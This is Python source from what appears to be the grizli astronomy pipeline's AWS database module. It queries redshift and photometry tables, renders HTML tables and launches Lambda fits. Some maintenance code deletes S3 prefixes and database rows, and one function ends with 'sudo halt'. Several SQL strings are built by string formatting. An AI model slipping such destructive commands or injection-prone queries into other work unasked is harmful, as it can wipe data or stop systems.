res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'a_image', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'err_ha', 'sn_oiii', 'f814w_tot_1*3.e18/8140/8140/splf01*1.e-29 as fresid', 'splf01/sple01 as sn01', '23.9-2.5*log(splf01*8140*8140/3.e18*1.e29)-mag_auto as dmag'], where="AND status > 5 AND t_g800l > 0 AND f814w_tot_1 > 0 AND splf01 != 0 AND splf01/sple01 > 1 AND f814w_tot_1*3.e18/8140/8140/splf01*1.e-29 > 0 AND (f814w_tot_1*3.e18/8140/8140/splf01*1.e-29 < 0.3 OR f814w_tot_1*3.e18/8140/8140/splf01*1.e-29 > 4)", table_root='g800l_oiii_mismatch', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
sql = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'a_image', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'err_ha', 'sn_oiii', 'splf01', 'sple01', 'f814w_tot_1', 'f850lp_tot_1', 'flux_auto/flux_iso as flux_aper_corr', '23.9-2.5*log(splf01*8140*8140/3.e18*1.e29)-mag_auto as dmag'], where="AND status > 5 AND t_g800l > 0 AND splf01 > 0", table_root='g800l_oiii_mismatch', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'], get_sql=True)
res = pd.read_sql_query(sql, engine)
splmag = 23.9-2.5*np.log10(np.maximum(res['splf01'], 1.e-22)*8140**2/3.e18*1.e29)
sql = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'a_image', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'err_ha', 'sn_oiii', 'splf03', 'sple03', 'f140w_tot_1', 'f160w_tot_1', 'flux_auto/flux_iso as flux_aper_corr'], where="AND status > 5 AND t_g141 > 0 AND sple03 > 0", table_root='g800l_oiii_mismatch', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'], get_sql=True)
res = pd.read_sql_query(sql, engine)
splmag = 23.9-2.5*np.log10(np.maximum(res['splf03'], 1.e-22)*1.2e4**2/3.e18*1.e29)
# Number of matches per field
counts = pd.read_sql_query("select root, COUNT(root) as n from redshift_fit, photometry_apcorr where phot_root = p_root AND id = p_id AND bic_diff > 50 AND mag_auto < 24 group by root;", engine)
def from_sql(query, engine, **kwargs):
    """
    Run a SQL query and return the result as a formatted `~grizli.utils.GTable`.

    Parameters
    ----------
    query : str
        SQL query string.

    engine : sqlalchemy engine / DBAPI connection
        Database connection passed to `pandas.read_sql_query`.

    kwargs : dict
        Extra keyword arguments passed to `set_column_formats`.

    Returns
    -------
    table : `~grizli.utils.GTable`
        Query result with display formats applied.
    """
    import pandas as pd
    from grizli import utils

    dataframe = pd.read_sql_query(query, engine)
    table = utils.GTable.from_pandas(dataframe)
    set_column_formats(table, **kwargs)

    return table
def render_for_notebook(tab, image_extensions=['stack', 'full', 'line'], bucket='grizli-v1', max_rows=20, link_root=True, link_type='grism'):
    """
    Render images for inline display in a notebook

    In [1]: from IPython.display import HTML
    In [2]: HTML(tab)

    Parameters
    ----------
    tab : table-like (has ``colnames``, slicing, ``copy``, ``to_pandas``)
        Catalog with at least ``root`` and ``id`` columns.

    image_extensions : list
        Cutout/figure extensions to turn into ``<img>`` columns.

    bucket : str
        Default S3 bucket; COSMOS fields (``cos-g*``) are redirected to
        ``grizli-cosmos-v2``.

    max_rows : int
        Only the first `max_rows` rows are rendered.

    link_root, link_type : bool, str
        If `link_root`, the ``root`` column becomes a hyperlink
        (``link_type='grism'``) or a combined root/id archive-query link
        (``'cds'``, ``'eso'``, ``'alma'``, ``'mast'``; requires ``ra``/``dec``
        columns).

    Returns
    -------
    out : str
        HTML table string.
    """
    import pandas as pd

    # FIX: ``-1`` was deprecated and removed (raises in pandas >= 2.0);
    # ``None`` is the documented way to disable column truncation.
    pd.set_option('display.max_colwidth', None)

    rows = tab[:max_rows].copy()

    # COSMOS fields live in a different bucket
    buckets = [bucket]*len(rows)
    for i, r in enumerate(rows['root']):
        if r.startswith('cos-g'):
            buckets[i] = 'grizli-cosmos-v2'

    rows['bucket'] = buckets
    rows['ext'] = 'longstring'  # longer than the longest extension

    s3url = 'https://s3.amazonaws.com/{bucket}/Pipeline/{root}/Extractions/{root}_{id:05d}.{ext}.png'

    def href_root(root):
        # Hyperlink to the per-field extraction summary page
        if root.startswith('cos-g'):
            bucket_i = 'grizli-cosmos-v2'
        else:
            bucket_i = bucket

        s3 = 'https://s3.amazonaws.com/'+bucket_i+'/Pipeline/{0}/Extractions/{0}.html'
        return '<a href={0}>{1}</a>'.format(s3.format(root), root)

    def path_to_image_html(path):
        # Clickable inline image
        return '<a href={0}><img src="{0}"/></a>'.format(path)

    # link for root
    fmt = {}
    cols = list(rows.colnames)
    if link_root:
        if link_type == 'grism':
            fmt = {'root': href_root}
        elif (link_type in ['cds', 'eso', 'alma', 'mast']) & ('ra' in cols):
            # Only import eazy when an archive-query link is requested so
            # the common 'grism' path works without it installed
            from eazy import utils as eu
            funcs = {'cds': eu.cds_query,
                     'eso': eu.eso_query,
                     'alma': eu.alma_query,
                     'mast': eu.mast_query}

            urls = [funcs[link_type](ra, dec)
                    for ra, dec in zip(tab['ra'], tab['dec'])]

            href = [f'<a href="{u}"> {r} {i} </a>'
                    for u, r, i in zip(urls, tab['root'], tab['id'])]

            rows['xroot'] = href
            cols = ['xroot'] + cols
            # xroot supersedes these columns
            for c in ['root', 'id', 'ra', 'dec']:
                cols.pop(cols.index(c))

    # One image column per requested extension
    for ext in image_extensions:
        rows['ext'] = ext
        urls = [s3url.format(**row) for row in rows.to_pandas().to_dict(orient='records')]
        rows[ext] = urls
        fmt[ext] = path_to_image_html
        cols.append(ext)

    # Helper columns are not part of the rendered output
    rows.remove_columns(['bucket', 'ext'])
    for c in ['bucket', 'ext']:
        cols.pop(cols.index(c))

    out = rows[cols].to_pandas().to_html(escape=False, formatters=fmt)
    return out
def add_to_charge():
    """
    Append fields that exist in ``photometry_apcorr`` but are missing from
    the ``charge_fields`` table.

    Side effects: prints each new field root and inserts rows into the
    ``charge_fields`` database table.
    """
    # FIX: pandas was used below (pd.DataFrame) but never imported
    import pandas as pd
    from grizli.aws import db

    engine = db.get_db_engine()

    p = db.from_sql('select distinct p_root from photometry_apcorr', engine)
    f = db.from_sql('select distinct field_root from charge_fields', engine)

    new_fields = []
    for root in p['p_root']:
        if root not in f['field_root']:
            print(root)
            new_fields.append(root)

    df = pd.DataFrame()
    df['field_root'] = new_fields
    df['comment'] = 'CANDELS'

    # FIX: use .loc rather than chained assignment, which is unreliable
    # (SettingWithCopy) and fails under pandas copy-on-write
    ix = df['field_root'] == 'j214224m4420'
    df.loc[ix, 'comment'] = 'Rafelski UltraDeep'

    df.to_sql('charge_fields', engine, index=False, if_exists='append', method='multi')
def add_by_footprint(footprint_file='j141156p3415_footprint.fits', engine=None):
    """
    Insert a single field into ``charge_fields`` from a footprint FITS file.

    Parameters
    ----------
    footprint_file : str
        Footprint catalog; metadata (NAME, XMIN/XMAX, YMIN/YMAX, MW_EBV) and
        the ra/dec/filter/target/proposal_id columns are read from it.

    engine : sqlalchemy engine, optional
        Database connection; created with `db.get_db_engine` if not provided.

    Returns
    -------
    False if the field is already present in ``charge_fields``, otherwise
    None after inserting the new row.
    """
    import pandas as pd
    from grizli.aws import db

    ## By footprint
    if engine is None:
        engine = db.get_db_engine()

    #ch = pd.read_sql_query('select * from charge_fields', engine)
    existing = pd.read_sql_query('select distinct field_root from charge_fields', engine)

    fp = utils.read_catalog(footprint_file)
    root = fp.meta['NAME']

    # Skip fields already in the table
    if root in existing['field_root'].tolist():
        print(f'Field found: {root}')
        return False

    df = pd.DataFrame()
    df['field_root'] = [root]
    df['comment'] = 'manual'

    # Field bounding box and extinction from the footprint metadata
    df['field_xmin'] = fp.meta['XMIN']
    df['field_xmax'] = fp.meta['XMAX']
    df['field_ymin'] = fp.meta['YMIN']
    df['field_ymax'] = fp.meta['YMAX']
    df['field_ra'] = np.mean(fp['ra'])
    df['field_dec'] = np.mean(fp['dec'])
    df['mw_ebv'] = fp.meta['MW_EBV']

    fp.rename_column('filter', 'filters')

    # Space-separated unique values for the list-like columns
    for column in ['filters', 'target', 'proposal_id']:
        df[column] = ' '.join([entry for entry in np.unique(fp[column])])

    #df['proposal_id'] = ' '.join([t for t in np.unique(fp['target'])])
    print(f'Send {root} to db.charge_fields')

    df.to_sql('charge_fields', engine, index=False, if_exists='append', method='multi')
def update_charge_fields():
    """
    Refresh the ``log`` column of ``charge_fields`` from the pipeline status
    logs on S3 and add any new local footprint files to the table.

    Side effects: shells out to ``aws s3 ls`` for each status directory,
    writes temp files under ``/tmp``, and updates the database in place via
    a ``log_tmp`` staging table.
    """
    from grizli.aws import db

    # FIX: `engine` was referenced below without ever being defined,
    # which raised NameError; create the connection here
    engine = db.get_db_engine()

    # Register any footprints present in the working directory
    files = [f.replace('.png', '.fits') for f in glob.glob('j*footprint.png')]
    files.sort()
    for file in files:
        db.add_by_footprint(file, engine=engine)

    orig = db.from_sql('select field_root, log from charge_fields', engine)
    gtab = db.from_sql('select field_root, log from charge_fields', engine)

    bucket = 'grizli-v1'

    # Most recent status wins: Start < Failed < Finished
    for st, dir in enumerate(['Start', 'Failed', 'Finished']):
        print(dir)
        os.system('aws s3 ls s3://{0}/Pipeline/Log/{1}/ | sed "s/.log//" > /tmp/{1}'.format(bucket, dir))
        fin = utils.read_catalog(f'/tmp/{dir}', format='ascii')
        print('{0} {1}'.format(dir, len(fin)))
        for i, r in enumerate(fin['col4']):
            ix = gtab['field_root'] == r
            if ix.sum() > 0:
                gtab['log'][ix] = '{0} {1}-{2}'.format(dir, fin['col1'][i], fin['col2'][i])

    # update the table
    df = gtab[~gtab['log'].mask].to_pandas()
    df.to_sql('log_tmp', engine, index=False, if_exists='replace', method='multi')

    sql = "UPDATE charge_fields ch SET log = tmp.log FROM log_tmp tmp WHERE tmp.field_root = ch.field_root"
    engine.execute(sql)
def overview_table():
    """
    Generate a new overview table with the redshift histograms
    """
    from grizli.aws import db as grizli_db
    import pandas as pd
    from grizli import utils

    engine = grizli_db.get_db_engine()

    ch = from_sql("select * from charge_fields", engine)

    # Per-field counts: bright sources and robust redshifts
    by_mag = from_sql("select p_root as root, COUNT(p_root) as nmag from photometry_apcorr where mag_auto < 24 group by p_root;", engine)
    by_nz = from_sql("select root, COUNT(root) as nz from redshift_fit where bic_diff > 30 group by root;", engine)

    # Merge the counts into the charge table, -1 where no match found
    for counts_tab in [by_mag, by_nz]:
        new_col = counts_tab.colnames[1]
        ch[new_col] = -1
        for field, n in zip(counts_tab['root'], counts_tab[new_col]):
            ix = ch['field_root'] == field
            ch[new_col][ix] = n

    # Redshift-histogram thumbnails linked to the field summary pages
    zhist = ['https://s3.amazonaws.com/grizli-v1/Pipeline/{0}/Extractions/{0}_zhist.png'.format(r) for r in ch['field_root']]
    ch['zhist'] = ['<a href="{1}"><img src={0} height=300px></a>'.format(zh, zh.replace('_zhist.png', '.html')) for zh in zhist]

    cols = ['field_root', 'field_ra', 'field_dec', 'mw_ebv', 'gaia5', 'nassoc', 'nfilt', 'filter', 'target', 'comment', 'proposal_id', 'proposal_pi', 'field_t_g800l', 'field_t_g102', 'field_t_g141', 'mast', 'footprint', 'rgb', 'nmag', 'nz', 'zhist', 'summary', 'log']

    # Only non-string columns get sort controls
    sortable = [c for c in cols if not hasattr(ch[c][0], 'upper')]

    # https://s3.amazonaws.com/grizli-v1/Master/CHArGE-July2019.html
    table_root = 'CHArGE-July2019.zhist'

    ch[cols].write_sortable_html('{0}.html'.format(table_root), replace_braces=True, localhost=False, max_lines=1e5, table_id=None, table_class='display compact', css=None, filter_columns=sortable, buttons=['csv'], toggle=True, use_json=True)

    os.system('aws s3 sync ./ s3://grizli-v1/Master/ --exclude "*" --include "{1}.html" --include "{1}.json" --acl public-read'.format('', table_root))
def run_all_redshift_fits():
    """
    Interactive driver: launch lambda redshift fits for every charge field
    with grism data that does not yet have entries in ``redshift_fit``.

    NOTE(review): this is script-like scratch code meant to be run
    line-by-line; the cleanup section after the loop reuses the loop's
    leftover ``root``/``zmax`` variables and is not safe to call as a
    function end-to-end.
    """
    ##############
    # Run all
    from grizli.aws import db as grizli_db
    import pandas as pd
    engine = grizli_db.get_db_engine()

    # By grism
    # Fields with any grism exposure time that finished preprocessing
    res = pd.read_sql_query("select field_root, field_t_g800l, field_t_g102, field_t_g141, proposal_pi from charge_fields where (nassoc < 200 AND (field_t_g800l > 0 OR field_t_g141 > 0 OR field_t_g102 > 0) AND log LIKE '%%inish%%');", engine)
    # Fields that already have fits in the database
    orig_roots = pd.read_sql_query('select distinct root from redshift_fit', engine)['root'].tolist()

    count = 0
    for i, (root, ta, tb, tr, pi) in enumerate(zip(res['field_root'], res['field_t_g800l'], res['field_t_g102'], res['field_t_g141'], res['proposal_pi'])):
        if root in orig_roots:
            continue

        count += 1

        # Redshift upper limit scales with the reddest available grism:
        # G800L only -> 1.6, G102 -> 2.2, G141 -> 3.2
        zmax = 1.6
        if tb > 0:
            zmax = 2.2

        if tr > 0:
            zmax = 3.2

        print('\n\n', i, count, root, ta, tb, tr, pi, zmax, '\n\n')

        phot_root = None

        # Best-effort: skip fields whose lambda submission fails
        try:
            grizli_db.run_lambda_fits(root, phot_root=phot_root,
                min_status=6, zr=[0.01, zmax])
        except:
            pass

    ####
    # Redo fits on reprocessed fields
    # for i in range(2,11):
    # root = 'j214224m4420gr{0:02d}'.format(i)
    # print(root)
    #
    # NOTE(review): `root` here is whatever leaked from the loop above (or
    # was set manually); the second `engine` argument to execute() appears
    # to be ignored by sqlalchemy — TODO confirm
    res = engine.execute("DELETE from redshift_fit WHERE (root = '{0}')".format(root), engine)
    res = engine.execute("DELETE from redshift_fit_quasar WHERE (root = '{0}')".format(root), engine)
    res = engine.execute("DELETE from stellar_fit WHERE (root = '{0}')".format(root), engine)
    res = engine.execute("DELETE from photometry_apcorr WHERE (p_root = '{0}')".format(root), engine)

    if False:
        # Remove the whole thing
        res = engine.execute("DELETE from exposure_log WHERE (parent = '{0}')".format(root), engine)
        res = engine.execute("DELETE from charge_fields WHERE (field_root = '{0}')".format(root), engine)

    # Resubmit the fits for the reprocessed field
    grizli_db.run_lambda_fits(root, phot_root=root, min_status=2, zr=[0.01, zmax], mag_limits=[15, 26], engine=engine)

    # for root in "j233844m5528 j105732p3620 j112416p1132 j113812m1134 j113848m1134 j122852p1046 j143200p0959 j152504p0423 j122056m0205 j122816m1132 j131452p2612".split():
    # Regenerate the per-field summary table, thumbnails and z histogram
    res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 't_g102', 't_g141', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'zwidth1/(1+z_map) as zw1', 'q_z', 'q_z > -0.69 as q_z_TPR90', 'dlinesn'], where="AND status > 4 AND root = '{0}'".format(root), table_root=root, sync='s3://grizli-v1/Pipeline/{0}/Extractions/'.format(root), png_ext=['R30', 'stack', 'full', 'rgb', 'line'], show_hist=True)

    grizli_db.aws_rgb_thumbnails(root, engine=engine)

    os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Extractions/{0}_zhist.png s3://grizli-v1/tables/'.format(root))
def aws_rgb_thumbnails(root, bucket='grizli-v1', engine=None, thumb_args={}, ids=None, verbose=True, res=None):
    """
    Make thumbnails for everything that has an entry in the redshift_fit table

    Parameters
    ----------
    root : str
        Field root used to query ``redshift_fit`` and build the S3 paths.

    bucket : str
        S3 bucket holding the ``Pipeline/{root}`` products.

    engine : sqlalchemy engine, optional
        Database connection; created if not provided.

    thumb_args : dict
        Overrides merged into the default thumbnail event payload.

    ids : iterable, optional
        If given, only send events for these object ids.

    verbose : bool
        Passed to `fit_redshift_lambda.send_event_lambda`.

    res : table, optional
        Precomputed (root, id, ra, dec) table; queried from the database
        if not provided.
    """
    from grizli.aws import aws_drizzler, fit_redshift_lambda

    if engine is None:
        engine = get_db_engine(echo=False)

    if res is None:
        res = from_sql("SELECT root, id, ra, dec FROM redshift_fit WHERE root = '{0}' AND ra > 0".format(root), engine)

    aws_prep_dir = 's3://{0}/Pipeline/{1}/Prep/'.format(bucket, root)
    aws_bucket = 's3://{0}/Pipeline/{1}/Thumbnails/'.format(bucket, root)

    # Default lambda event payload; per-object fields filled in below
    event = {'make_segmentation_figure': True,
             'aws_prep_dir': aws_prep_dir,
             'single_output': True,
             'combine_similar_filters': True,
             'show_filters': ['visb', 'visr', 'y', 'j', 'h'],
             'include_ir_psf': False,
             'include_saturated': True,
             'subtract_median': True,
             'sync_fits': True,
             'thumb_height': 2.0,
             'scale_ab': 21,
             'aws_bucket': aws_bucket,
             'master': None,
             'rgb_params': {'xsize': 4, 'output_dpi': None,
                            'rgb_min': -0.01, 'add_labels': False,
                            'output_format': 'png', 'show_ir': False,
                            'scl': 2, 'suffix': '.rgb', 'mask_empty': False,
                            'tick_interval': 1, 'pl': 1},
             'remove': True,
             'filters': ['f160w', 'f140w', 'f125w', 'f105w', 'f110w', 'f098m',
                         'f850lp', 'f814w', 'f775w', 'f606w', 'f475w',
                         'f555w', 'f600lp', 'f390w', 'f350lp'],
             'half_optical_pixscale': True,
             'theta': 0,
             'kernel': 'square',
             'pixfrac': 0.33,
             'wcs': None,
             'size': 6,
             'pixscale': 0.1}

    # Caller-supplied overrides win over the defaults
    event.update(thumb_args)

    # One lambda event per selected object
    for src_root, src_id, src_ra, src_dec in zip(res['root'], res['id'],
                                                 res['ra'], res['dec']):
        if ids is not None:
            if src_id not in ids:
                continue

        event['ra'] = src_ra
        event['dec'] = src_dec
        event['label'] = '{0}_{1:05d}'.format(src_root, src_id)

        fit_redshift_lambda.send_event_lambda(event, verbose=verbose)
def count_sources_for_bad_persistence():
    """
    Count the number of extracted objects for each id and look for fields
    with few objects, which are usually problems with the persistence mask
    """
    import pandas as pd
    from grizli.aws import db as grizli_db
    from grizli import utils

    engine = grizli_db.get_db_engine(echo=False)

    # Number of matches per field
    counts = pd.read_sql_query("select root, COUNT(root) as n from redshift_fit, photometry_apcorr where phot_root = p_root AND id = p_id AND bic_diff > 5 AND mag_auto < 24 group by root;", engine)
    counts = utils.GTable.from_pandas(counts)

    # Sort order: suspicious fields with few matches come first
    order = np.argsort(counts['n'])

    # Reference shell commands to reprocess a problematic field
    sh = """
BUCKET=grizli-v
root=j113812m1134
aws s3 rm --recursive s3://grizli-v1/Pipeline/${root}/ --include "*"
grism_run_single.sh ${root} --run_fine_alignment=True --extra_filters=g800l --bucket=grizli-v1 --preprocess_args.skip_single_optical_visits=True --mask_spikes=True --persistence_args.err_threshold=1
"""
def add_missing_photometry():
    """
    Interactive driver: push photometric catalogs into ``photometry_apcorr``
    for fields that are missing them, then (re)run lambda redshift fits for
    the deep 3D-HST / CANDELS mosaics.

    NOTE(review): script-like scratch code meant to be run block-by-block.
    The three `res`/`orig_roots` queries below overwrite one another; only
    the last pair ("All photometry") feeds the loop.  The function ends
    with ``sudo halt``, shutting the machine down — do not call blindly.
    """
    # Add missing photometry
    import os
    import pandas as pd
    from grizli.aws import db as grizli_db
    from grizli.pipeline import photoz
    from grizli import utils

    engine = grizli_db.get_db_engine(echo=False)

    # Fields with redshift fits (superseded by the queries below)
    res = pd.read_sql_query("select distinct root from redshift_fit where root like 'j%%'", engine)['root'].tolist()
    orig_roots = pd.read_sql_query('select distinct p_root as root from photometry_apcorr', engine)['root'].tolist()

    # Missing grism fields?
    res = pd.read_sql_query("select field_root as root, field_t_g800l, field_t_g102, field_t_g141, proposal_pi from charge_fields where (field_t_g800l > 0 OR field_t_g141 > 0 OR field_t_g102 > 0) AND log LIKE '%%inish%%';", engine)['root'].tolist()
    orig_roots = pd.read_sql_query('select distinct root from redshift_fit', engine)['root'].tolist()

    # All photometry
    res = pd.read_sql_query("select field_root as root, field_t_g800l, field_t_g102, field_t_g141, proposal_pi from charge_fields where nassoc < 200 AND log LIKE '%%inish%%' AND field_root LIKE 'j%%';", engine)['root'].tolist()
    orig_roots = pd.read_sql_query('select distinct p_root as root from photometry_apcorr', engine)['root'].tolist()

    count = 0
    for root in res:
        if root not in orig_roots:
            #break
            count += 1
            print(count, root)

            # Fetch the aperture-corrected catalog, trying Extractions/
            # first and falling back to Prep/
            os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Extractions/{0}_phot_apcorr.fits .'.format(root))
            os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Extractions/{0}_phot.fits .'.format(root))

            if not os.path.exists('{0}_phot_apcorr.fits'.format(root)):
                os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Prep/{0}_phot_apcorr.fits .'.format(root))
                os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Prep/{0}_phot.fits .'.format(root))

            if os.path.exists('{0}_phot_apcorr.fits'.format(root)):
                grizli_db.add_phot_to_db(root, delete=False, engine=engine)
            else:
                if os.path.exists('{0}_phot.fits'.format(root)):
                    # Make the apcorr file
                    utils.set_warnings()

                    total_flux = 'flux_auto'
                    # Best-effort: skip fields where eazy fails
                    try:
                        obj = photoz.eazy_photoz(root, object_only=True,
                                  apply_prior=False, beta_prior=True,
                                  aper_ix=1,
                                  force=True,
                                  get_external_photometry=False,
                                  compute_residuals=False,
                                  total_flux=total_flux)
                    except:
                        continue

                    grizli_db.add_phot_to_db(root, delete=False,
                                             engine=engine, nmax=500)

    # 3D-HST
    # Reference shell commands to stage the EGS mosaic catalogs
    copy = """
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/egs-mosaic_phot_apcorr.fits s3://grizli-v1/Pipeline/egs-grism-j141956p5255/Extractions/egs-grism-j141956p5255_phot_apcorr.fits --acl public-read
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/egs-mosaic_phot.fits s3://grizli-v1/Pipeline/egs-grism-j141956p5255/Extractions/egs-grism-j141956p5255_phot.fits --acl public-read
"""

    grizli_db.run_lambda_fits('egs-grism-j141956p5255', min_status=6, zr=[0.01, 3.2])

    copy = """
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/uds-mosaic_phot_apcorr.fits s3://grizli-v1/Pipeline/uds-grism-j021732m0512/Extractions/uds-grism-j021732m0512_phot_apcorr.fits --acl public-read
"""

    grizli_db.run_lambda_fits('uds-grism-j021732m0512', min_status=6, zr=[0.01, 3.2])

    # GDS
    copy = """
aws s3 rm s3://grizli-v1/Pipeline/gds-grism-j033236m2748/Extractions/ --recursive --exclude "*" --include "gds-grism-j033236m2748_[0-9]*"
aws s3 rm s3://grizli-v1/Pipeline/gds-g800l-j033236m2748/Extractions/ --recursive --exclude "*" --include "gds-g800l-j033236m2748_[0-9]*"
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/gds-mosaic_phot_apcorr.fits s3://grizli-v1/Pipeline/gds-grism-j033236m2748/Extractions/gds-grism-j033236m2748_phot_apcorr.fits --acl public-read
aws s3 cp s3://grizli-v1/Pipeline/gds-grism-j033236m2748/Extractions/gds-grism-j033236m2748_phot_apcorr.fits s3://grizli-v1/Pipeline/gds-g800l-j033236m2748/Extractions/gds-g800l-j033236m2748_phot_apcorr.fits --acl public-read
"""

    grizli_db.run_lambda_fits('gds-grism-j033236m2748', phot_root='gds-grism-j033236m2748', min_status=6, zr=[0.01, 3.2], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})
    grizli_db.run_lambda_fits('gds-g800l-j033236m2748', phot_root='gds-grism-j033236m2748', min_status=6, zr=[0.01, 1.6], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})

    # GDN
    copy = """
#aws s3 rm s3://grizli-v1/Pipeline/gds-g800l-j033236m2748/Extractions/ --recursive --exclude "*" --include "gds-g800l-j033236m2748_[0-9]*"
aws s3 rm s3://grizli-v1/Pipeline/gdn-grism-j123656p6215/Extractions/ --recursive --exclude "*" --include "gdn-grism-j123656p6215_[0-9]*"
aws s3 rm s3://grizli-v1/Pipeline/gdn-g800l-j123656p6215/Extractions/ --recursive --exclude "*" --include "gdn-g800l-j123656p6215_[0-9]*"
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/gdn-mosaic_phot_apcorr.fits s3://grizli-v1/Pipeline/gdn-grism-j123656p6215/Extractions/gdn-grism-j123656p6215_phot_apcorr.fits --acl public-read
aws s3 cp s3://grizli-v1/Pipeline/gdn-grism-j123656p6215/Extractions/gdn-grism-j123656p6215_phot_apcorr.fits s3://grizli-v1/Pipeline/gdn-g800l-j123656p6215/Extractions/gdn-g800l-j123656p6215_phot_apcorr.fits --acl public-read
"""

    grizli_db.run_lambda_fits('gdn-grism-j123656p6215', phot_root='gdn-grism-j123656p6215', min_status=6, zr=[0.01, 3.2], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})
    grizli_db.run_lambda_fits('gdn-g800l-j123656p6215', phot_root='gdn-grism-j123656p6215', min_status=6, zr=[0.01, 1.6], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})

    # 3D-HST G800L
    copy = """
aws s3 rm s3://grizli-v1/Pipeline/egs-g800l-j141956p5255/Extractions/ --recursive --exclude "*" --include "egs-g800l-j141956p5255_[0-9]*"
aws s3 cp s3://grizli-v1/Pipeline/egs-grism-j141956p5255/Extractions/egs-grism-j141956p5255_phot_apcorr.fits s3://grizli-v1/Pipeline/egs-g800l-j141956p5255/Extractions/egs-g800l-j141956p5255_phot_apcorr.fits --acl public-read
"""

    grizli_db.run_lambda_fits('egs-g800l-j141956p5255', phot_root='egs-grism-j141956p5255', min_status=6, zr=[0.01, 1.6], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})

    # Block until the lambda fits have landed in the database
    res = grizli_db.wait_on_db_update('egs-g800l-j141956p5255', dt=15, n_iter=120, engine=engine)
    res = grizli_db.wait_on_db_update('uds-g800l-j021732m0512', dt=15, n_iter=120, engine=engine)

    # UDS
    copy = """
aws s3 rm s3://grizli-v1/Pipeline/uds-g800l-j021732m0512/Extractions/ --recursive --exclude "*" --include "uds-g800l-j021732m0512_[0-9]*"
aws s3 cp s3://grizli-v1/Pipeline/uds-grism-j021732m0512/Extractions/uds-grism-j021732m0512_phot_apcorr.fits s3://grizli-v1/Pipeline/uds-g800l-j021732m0512/Extractions/uds-g800l-j021732m0512_phot_apcorr.fits --acl public-read
"""

    grizli_db.run_lambda_fits('uds-g800l-j021732m0512', phot_root='uds-grism-j021732m0512', min_status=6, zr=[0.01, 1.6], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})
    grizli_db.run_lambda_fits('egs-g800l-j141956p5255', phot_root='egs-grism-j141956p5255', min_status=6, zr=[0.01, 1.6], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})

    # Cosmos on oliveraws
    copy = """
aws s3 rm s3://grizli-cosmos-v2/Pipeline/cos-grism-j100012p0210/Extractions/ --recursive --exclude "*" --include "cos-grism-j100012p0210_[0-9]*"
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/Cosmos/cos-cnd-mosaic_phot_apcorr.fits s3://grizli-cosmos-v2/Pipeline/cos-grism-j100012p0210/Extractions/cos-grism-j100012p0210_phot_apcorr.fits --acl public-read
"""

    grizli_db.run_lambda_fits('cos-grism-j100012p0210', min_status=6, zr=[0.01, 3.2], mag_limits=[17, 17.1], bucket='grizli-cosmos-v2')

    # WARNING: shuts down the (assumed EC2) host when done
    os.system('sudo halt')
def set_column_formats(info, extra={}, convert_mtime=True, **kwargs):
    """
    Set predefined format strings of table columns

    Parameters
    ----------
    info : `astropy.table.Table`
        Data table, updated in place

    extra : dict
        Dictionary with extra format codes as values and column names as keys

    convert_mtime : bool
        If ``'mtime'`` column found in `info`, convert all time strings to
        sortable ISO format with `~grizli.utils.ctime_to_iso`.
    """
    # Print formats
    formats = {}
    formats['ra'] = formats['dec'] = '.5f'
    formats['mag_auto'] = formats['delta_z'] = '.2f'
    formats['chinu'] = formats['chimin'] = formats['chimax'] = '.1f'
    formats['bic_diff'] = formats['bic_temp'] = formats['bic_spl'] = '.1f'
    formats['bic_poly'] = '.1f'
    formats['dlinesn'] = formats['bic_spl'] = '.1f'
    formats['flux_radius'] = formats['flux_radius_20'] = '.1f'
    formats['flux_radius_90'] = '.1f'
    formats['log_pdf_max'] = formats['log_risk'] = '.1f'
    formats['d4000'] = formats['d4000_e'] = '.2f'
    formats['dn4000'] = formats['dn4000_e'] = '.2f'

    # FIX: 'reshift' was a typo that left a 'redshift' column unformatted;
    # keep the old key for safety and add the correct one
    formats['z_spec'] = formats['z_map'] = formats['reshift'] = '.3f'
    formats['redshift'] = '.3f'

    formats['z_spec_dr'] = '.1f'
    formats['t_g141'] = formats['t_g102'] = formats['t_g800l'] = '.0f'
    formats['zwidth1'] = formats['zw1'] = '.3f'
    formats['zwidth2'] = formats['zw2'] = '.3f'
    formats['q_z'] = '.2f'
    formats['dz'] = '.3f'

    # Caller-supplied formats override the defaults
    for k in extra:
        formats[k] = extra[k]

    for c in info.colnames:
        if c in formats:
            info[c].format = formats[c]
        elif c.startswith('sn_'):
            info[c].format = '.1f'
        elif c.startswith('mag_'):
            info[c].format = '.2f'
        elif '_ujy' in c:
            info[c].format = '.2f'
        elif c.startswith('ew_'):
            info[c].format = '.1f'
        elif ('q_z' in c):
            info[c].format = '.2f'
        elif ('zw' in c) | ('z_map' in c):
            info[c].format = '.3f'
        elif ('chinu' in c):
            info[c].format = '.1f'
